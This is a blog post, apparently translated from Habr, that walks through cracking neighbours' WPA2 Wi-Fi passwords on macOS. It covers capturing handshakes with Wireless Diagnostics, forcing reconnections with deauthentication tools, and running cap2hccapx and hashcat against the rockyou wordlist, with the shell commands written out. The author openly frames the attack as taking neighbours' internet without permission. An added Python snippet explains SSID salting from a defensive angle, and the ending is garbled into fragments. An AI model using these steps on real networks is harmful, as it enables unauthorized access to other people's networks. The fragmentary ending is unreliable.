
Getting the neighbor's Wi-Fi using standard macOS tools.

I have always been a fan of bugs and vulnerabilities "on the surface". I have always envied the guys who write exploits for the most protected operating systems, while I could only use ready-made scripts. However, my post about vulnerabilities in version control systems scored more than 1000 likes on Habr and remains the top-1 post in the entire history of Habr, even though it was written 9 (!) years ago.

And today I would like to show and explain, on my fingers, such a thing as wardriving. More precisely, how, using standard macOS tools, you can get the Wi-Fi passwords of your neighbors. Fate has thrown me into yet another apartment. Historically, I'm lazy. A couple of years ago I already wrote that my laziness, a new apartment and a Beeline (formerly Corbina) wire helped me find a bug in Beeline and get free internet on their network. Today it is happening again: I am in a new apartment, there is not even a wire, but the neighbors have many networks.


Tired of burning through mobile data, I decided that “the neighbors need help”, and by “neighbors” I meant myself ...

Once upon a time I was fond of wardriving, right up until I found the Beeline wire in the old apartment) There, too, there were many networks nearby, and the first thing that occurred to me was that I needed Wi-Fi. Many years have passed since then. Refreshing my knowledge of wardriving, I found a mention online that 90% of the work of the specialized utilities can “today” be done with standard macOS services. Looking ahead, I would like to note that I am not the author of this method; I found it myself on the foreign internet, so, let's say, this is a free translation and a detailed, artistic description of a way to get Wi-Fi passwords using standard macOS tools, nothing more.

Principles of getting the neighbors' Wi-Fi passwords


You have to understand that with a Wi-Fi receiver, which you can find in any laptop today, you can “sniff” all the wireless traffic around you. Earlier, when networks were open, it was enough to come to McDonald's and by the evening you could get 100-200 Odnoklassniki accounts. Open network + lack of HTTPS did their job.

Now everything is more interesting: everyone is switching to HTTPS (taking this opportunity, I want to say hello to Let's Encrypt. Beloved Let's Encrypt, I'm on TV and say hello to you, thank you for existing), everyone has even forgotten about WEP, everyone has WPA2. But, as you know, the sword was invented before the shield, and no WPA2 is an obstacle for a person who is hungry for the Internet and sees a bunch of Wi-Fi networks around him.

Let's continue. Having a Wi-Fi card, i.e. any modern laptop, we can sniff the traffic near us. But it is useless, because it is encrypted. The only things that can be picked out of it are metadata, such as network names and so on, and handshakes, i.e. clients authenticating to the network. They occur every time a device connects to a Wi-Fi network, for example when a neighbor comes home and the smartphone in his pocket latches onto the home Wi-Fi.

Roughly speaking, a handshake is an ordinary hash of the MD5 kind.
This really is quite rough. The key there is obtained from 4096 rounds of SHA1. To be precise, the formula is: Key = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 256)

By the way, you can see that the name of the access point is mixed in, so with a unique name, precomputation does not help. And this is an argument for changing the name of your access point to something of your own.
thanks to jia3ep
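As an added example (not from the original post), the key derivation from the formula above in Python, showing why the SSID salt defeats precomputation: a table of PMKs built for one network name cannot be reused against a network with a different name, and every guess costs the full 4096 HMAC-SHA1 rounds. The wordlist and the SSIDs are constructed; the expected value for passphrase "password" with SSID "IEEE" is the published test vector from IEEE 802.11i Annex H.

```python
import hashlib

# WPA/WPA2-Personal: PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 256 bits)
ITERATIONS = 4096
PMK_LEN = 32  # 256 bits


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key exactly as the formula in the post."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
        ITERATIONS, PMK_LEN,
    )


def precomputed_table(wordlist, ssid):
    """A lookup table of PMKs is bound to the SSID it was salted with:
    every entry costs 4096 rounds, and it is only valid for that one name."""
    return {derive_pmk(word, ssid): word for word in wordlist}


def lookup(table, pmk):
    """Return the passphrase for a PMK if the table contains it, else None."""
    return table.get(pmk)


# Constructed sample wordlist (hypothetical, for illustration only)
WORDLIST = ["password", "qwerty123", "letmein"]

# Table built for a common default network name (assumption: "linksys")
TABLE_DEFAULT = precomputed_table(WORDLIST, "linksys")


def demo():
    """Same weak passphrase on two networks: the table finds it only for the
    network whose name it was built for; the renamed network yields a different
    PMK and the table misses."""
    pmk_default = derive_pmk("password", "linksys")
    pmk_renamed = derive_pmk("password", "kitchen-router-42")
    return lookup(TABLE_DEFAULT, pmk_default), lookup(TABLE_DEFAULT, pmk_renamed)


if __name__ == "__main__":
    print("IEEE test vector:", derive_pmk("password", "IEEE").hex())
    print("lookup on default SSID / renamed SSID:", demo())
```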

And yes, I lied in my first paragraph about “decrypting”; this is a technical error and a substitution of concepts. Of course, it is impossible to decrypt a hash. It's like saying “taxi license”, knowing that taxi activity in the Russian Federation is not licensed. But it's just so convenient)

So. All we need is to find the handshakes in the radio traffic around us and “decrypt” them. And there used to be a lot of software for all this: one tool could competently scan the radio channel, another sniffed it into dumps nicely, another found the hashes in the dumps, another could break them. Now everything has become easier, thanks to Tim Cook. 90% of the work of third-party software is done by the standard application "Wireless Diagnostics". Many have seen it: when there are problems with Wi-Fi, the Mac offers to check the network. A useless utility that gives tips like "reboot the router". Well, that is how it seemed to me)

Extracting the passwords. The neighbors hang ;)


So, let's go. Hold Alt and click the Wi-Fi icon in the menu bar. In general, Alt+click always opens additional options in macOS, but that is a topic for a separate post.


In addition to other extra info, which is sometimes very useful, we can launch the Wireless Diagnostics program. I think everyone who uses a Mac remembers this window.



But we are interested in something else. Click on the menu item "Window" and see a set of additional utilities.


And right here there is everything that is needed, even more) We are specifically interested in two items: Scan and Analyzer. The first will show us all the networks around with additional information, such as which channel and which frequency a network operates on. The second allows you to sniff traffic on a specific channel and frequency.




By clicking the “Start” button in the Analyzer, the Wi-Fi card switches to receive mode and starts capturing the radio around it; the dump is written to /var/tmp.



The *.wcap files are our dumps. They contain traffic that is useless to us; what we need are the handshakes.

We must understand that we need to catch precisely the handshakes, i.e. we need to sniff the traffic at the moment a neighbor comes home in the evening. Or, if you have another device on macOS or any other OS, the nukers will help you: programs that send out spoofed disconnect commands, for example JamWiFi. But that is only if you really can't wait) In my experience, it's enough just to run the Analyzer at 6 pm for an hour.

Next we need to install naive-hashcat and hashcat-utils.

“Stop”, you say, “you promised to break the neighbors' networks using standard tools?”) Ha! And you believed me? In fact, we did 90% of the work with standard tools through the GUI. We already have the hashes; all we need is to break them. I'm sure you can do everything with standard utilities, but it's easier to use hashcat. We build the software through brew or from source. First of all, we need to convert our dump, leaving only our hashes in it. This is the cap2hccapx binary from the package.

# clone hashcat-utils
git clone https://github.com/hashcat/hashcat-utils.git
Cloning into 'hashcat-utils'...
remote: Counting objects: 403, done.
remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403
Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done.
Resolving deltas: 100% (257/257), done.

# build
cd hashcat-utils/src/ && make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

# convert the dump, keeping only the handshakes (hccapx format)
./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx






Now, step 2, “breaking”. Install naive-hashcat:

git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# build hashcat for OSX
./build-hashcat-osx.sh

# download the dictionary for wpa/wpa2 (134MB)
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# run it with the hash file, the output file, and hash type 2500, which is WPA, as described for naive-hashcat

HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh



The closing paragraphs are garbled in the extraction; the surviving fragments are the figures 2000, 7, 1080gtx, 400 and 2, the result file home-wifi.txt, and a mention of Kali Linux and MacOS.

Source: https://habr.com/ru/post/347658/

